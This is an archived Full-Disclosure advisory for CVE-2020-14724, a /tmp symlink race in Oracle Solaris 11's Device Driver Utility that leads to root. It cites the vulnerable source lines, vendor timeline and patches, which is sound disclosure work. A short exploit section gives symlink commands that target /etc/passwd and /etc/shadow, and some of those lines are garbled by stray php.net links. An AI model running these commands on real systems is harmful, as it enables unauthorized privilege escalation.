lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 15 Jul 2020 00:02:52 -0400
From: "Larry W. Cashdollar via Fulldisclosure" <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver
 Utility v1.3.1 leads to root

Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root

Author: Larry W. Cashdollar, @_larry0

Date: 2020-02-02

CVE-2020-14724

Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html

Vendor: Oracle, fixed in July 14 2020 CPU https://www.oracle.com/security-alerts/cpujul2020.html.

Vendor Notified: 2020-02-02

Vendor Contact: secalert_us@...cle.com

Advisory: http://www.vapidlabs.com/advisory.php?v=212

Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."

Vulnerability:

Append contents of ddu_log to system files via symlink attack: 

In ./ddu-text/utils/ddu-text.py 

18 LOG_LOCATION = "/tmp/ddu_log" . 

45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 

50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, 

Elevation of priviledges via symlink attack due to chmod operation on /tmp file: 

In file ./ddu-text/utils/inner_window.py 

667: logfile = open('/tmp/ddu_err.log', 'a') 

695: logfile = open('/tmp/ddu_err.log', 'a') 

721: logfile = open('/tmp/ddu_err.log', 'a') 

748: logfile = open('/tmp/ddu_err.log', 'a') 

In file ./scripts/comp_lookup.sh 

33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh 

38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh 

449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh 

20:typeset err_log=/tmp/ddu_err.log 

There is a race condition here between file creation and chmod 666 where a local user can run a simple script to ensure the symlink exists after the ddu_err.log file is removed: 

In file ./scripts/probe.sh 569: 

# Make /tmp/ddu_err.log writable for every user 

571: if [ -f /tmp/ddu_err.log ]; then 

572: pfexec chmod 666 /tmp/ddu_err.log 

574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 

636:typeset err_log=/tmp/ddu_err.log 

These are also potential file clobbering issues: From probe.sh 

131: NIC_info_file=/tmp/dvt_network_info_file 

133: temp_file=/tmp/dvt_network_temp 

134: temp_file_2=/tmp/dvt_network_temp_2 

207: c_file=/tmp/str_ctrl_file 

208: c_file1=/tmp/str_ctrl_file_1 

209: c_file2=/tmp/str_ctrl_file_2 

210: c_file3=/tmp/str_ctrl_file_3 

211: c_file4=/tmp/str_ctrl_file_4 

212: c_file5=/tmp/str_ctrl_file_5 

328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 

329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 

330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 

398: temp_file1=/tmp/dvt_tmp_file1 

399: temp_file2=/tmp/dvt_tmp_file2 

462: cpu_tmpfile=/tmp/cpu_tmpfile 

490: memory_tmpfile=/tmp/memory_tmpfile 

624:typeset ctl_file=/tmp/dvt_ctl_file

 

Exploit Code:

1. Tested on Solaris 11 x86

2. larry@...Sun:~$ uname -a

3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc

4. and

5. Open Indiana 

6. root@...nindiana:/export/home/larry# uname -a

7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc

9. Append content to /etc/passwd

10. larry@...nindiana:/tmp$ ln -s /etc/passwd ddu_log

 

12. To get local root simply have ddu http://www.php.net/chmod 666 /etc/shadow

13. larry@...nindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.http://www.php.net/log; done

14.  

15. A better exploit:

 

https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

 

Patches to OpenIndiana

https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6

 

 

 

 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists